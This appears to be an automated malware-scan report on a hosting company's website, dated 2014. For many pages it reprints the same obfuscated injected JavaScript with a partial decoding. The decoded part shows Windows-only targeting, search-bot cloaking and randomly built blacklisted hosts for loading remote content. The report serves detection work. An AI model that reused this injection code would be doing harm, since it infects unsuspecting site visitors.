Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=arabhostingnetwork.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://arabhostingnetwork.com/ | 200 OK Content-Length: 81119 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://arabhostingnetwork.com/index.html | 200 OK Content-Length: 81119 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://arabhostingnetwork.com/domain/domain-search.htm | 200 OK Content-Length: 107229 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://arabhostingnetwork.com/products/hosting.htm | 200 OK Content-Length: 71607 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://arabhostingnetwork.com/products/../domain/domain-search.htm | 200 OK Content-Length: 107229 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://arabhostingnetwork.com/isp/index.htm | 200 OK Content-Length: 159279 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://arabhostingnetwork.com/isp/../domain/domain-search.htm | 200 OK Content-Length: 107229 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://arabhostingnetwork.com/support/customer-care.htm | 200 OK Content-Length: 63052 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://arabhostingnetwork.com/support/../domain/domain-search.htm | 200 OK Content-Length: 107229 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://arabhostingnetwork.com/contact/index.html | 200 OK Content-Length: 73705 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://arabhostingnetwork.com/contact/../domain/domain-search.htm | 200 OK Content-Length: 107229 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://arabhostingnetwork.com/general/faq.htm | 200 OK Content-Length: 53409 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://arabhostingnetwork.com/general/../domain/domain-search.htm | 200 OK Content-Length: 107229 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://arabhostingnetwork.com/general/about-us.htm | 200 OK Content-Length: 52011 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... | ||
http://arabhostingnetwork.com/plan-description/shared-unix.htm | 200 OK Content-Length: 61861 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: toolbarcom.org this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this ...[2164 bytes skipped]... Decoded script: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("hol ...[908 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: arabhostingnetwork.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 30 Sep 2014 01:49:33 GMT
Accept-Ranges: bytes
ETag: "3673d5-13cdf-4f81f76a"
Server: Apache/1.3.33 (Unix) PHP/4.4.0 FrontPage/5.0.2.2510
Content-Length: 81119
Content-Type: text/html
Last-Modified: Sun, 08 Apr 2012 20:39:06 GMT
...81119 bytes of data.
GET / HTTP/1.1
Host: arabhostingnetwork.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 30 Sep 2014 01:49:33 GMT
Accept-Ranges: bytes
ETag: "3673d5-13cdf-4f81f76a"
Server: Apache/1.3.33 (Unix) PHP/4.4.0 FrontPage/5.0.2.2510
Content-Length: 81119
Content-Type: text/html
Last-Modified: Sun, 08 Apr 2012 20:39:06 GMT
...81119 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: arabhostingnetwork.com
Referer: http://www.google.com/search?q=arabhostingnetwork.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: arabhostingnetwork.com
Referer: http://www.google.com/search?q=arabhostingnetwork.com
Result:
The result is similar to the first query. There are no suspicious redirects found.